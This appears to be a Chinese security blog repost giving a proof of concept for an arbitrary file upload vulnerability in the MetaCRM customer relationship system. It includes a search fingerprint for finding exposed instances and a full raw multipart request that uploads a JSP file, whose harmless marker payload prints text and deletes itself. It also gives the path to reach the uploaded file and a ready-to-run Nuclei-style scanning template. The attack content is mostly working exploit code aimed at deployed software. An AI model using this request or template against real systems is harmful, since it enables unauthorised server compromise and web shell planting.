MetaCRM客户关系管理系统存在任意文件上传漏洞-PoC

2024年5月9日11:46:58评论18 views字数 2618阅读8分43秒阅读模式

资产收集

body="/common/scripts/basic.js"

漏洞复现

MetaCRM客户关系管理系统存在任意文件上传漏洞-PoC

构造请求包

POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null& HTTP/1.1Host: Content-Length: 768Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0Mh3BfgWszxRFokhUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Referer: http://0.0.0.0/develop/systparam/softlogo/file2.jspConnection: close------WebKitFormBoundary0Mh3BfgWszxRFokhContent-Disposition: form-data; name="file"; filename="klms.jsp"Content-Type: text/plain<% out.print("HelloWorldTest");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>------WebKitFormBoundary0Mh3BfgWszxRFokhContent-Disposition: form-data; name="key"null------WebKitFormBoundary0Mh3BfgWszxRFokhContent-Disposition: form-data; name="form"null------WebKitFormBoundary0Mh3BfgWszxRFokhContent-Disposition: form-data; name="field"null------WebKitFormBoundary0Mh3BfgWszxRFokhContent-Disposition: form-data; name="filetitile"null------WebKitFormBoundary0Mh3BfgWszxRFokhContent-Disposition: form-data; name="filefolder"null------WebKitFormBoundary0Mh3BfgWszxRFokh--

返回包

MetaCRM客户关系管理系统存在任意文件上传漏洞-PoC

拼接url

http://host/userfile/default/userlogo/klms.jsp

MetaCRM客户关系管理系统存在任意文件上传漏洞-PoC

脚本

id: ZH-2024-05-09-001
info:
  name: MetaCRM客户关系管理系统存在任意文件上传漏洞
  author: Devil安全
  reference: https://mp.weixin.qq.com/s/r5vOIl2sp_GEVcl8VSu6mg
requests:
  - raw:
    - |
       POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null& HTTP/1.1
       Host:{{Hostname}}
       Content-Length: 768
       Content-Type: multipart/form-data; 
       boundary=----WebKitFormBoundary0Mh3BfgWszxRFokh
       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
       Referer: http://0.0.0.0/develop/systparam/softlogo/file2.jsp
       Connection: close

       ------WebKitFormBoundary0Mh3BfgWszxRFokh
       Content-Disposition: form-data; name="file"; filename="klms.jsp"
       Content-Type: text/plain

       <% out.print("Hello");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
       ------WebKitFormBoundary0Mh3BfgWszxRFokh
       Content-Disposition: form-data; name="key"

       null
       ------WebKitFormBoundary0Mh3BfgWszxRFokh
       Content-Disposition: form-data; name="form"

       null
       ------WebKitFormBoundary0Mh3BfgWszxRFokh
       Content-Disposition: form-data; name="field"

       null
       ------WebKitFormBoundary0Mh3BfgWszxRFokh
       Content-Disposition: form-data; name="filetitile"

       null
       ------WebKitFormBoundary0Mh3BfgWszxRFokh
       Content-Disposition: form-data; name="filefolder"

       null
       ------WebKitFormBoundary0Mh3BfgWszxRFokh--
    matchers:
     - type: word
       words:
         - "/userfile/default/userlogo/klms.jsp"
       condition: and
       part: body

ZH-2024-05-09-001

原文始发于微信公众号（Devil安全）：【漏洞复现】MetaCRM客户关系管理系统存在任意文件上传漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

MetaCRM客户关系管理系统存在任意文件上传漏洞-PoC

资产收集

脚本

某浏览系统存在延时注入

【漏洞复现】cockpit系统assetsmanager/upload接口存在文件上传漏洞 | 附poc

Weblogic任意文件上传漏洞

【已复现】(CVE-2023-39361)Cacti 未授权SQL注入漏洞

【已复现】致远OA前台任意用户密码修改漏洞

【漏洞复现】Juniper JunOS SRX EX 远程命令执行漏洞 CVE-2023-36844

CVE-2022-47966 SAML RCE

Openfire 身份认证绕过漏洞复现

Alibaba AnyProxy fetchBody 任意文件读取漏洞

发表评论

在线咨询

微信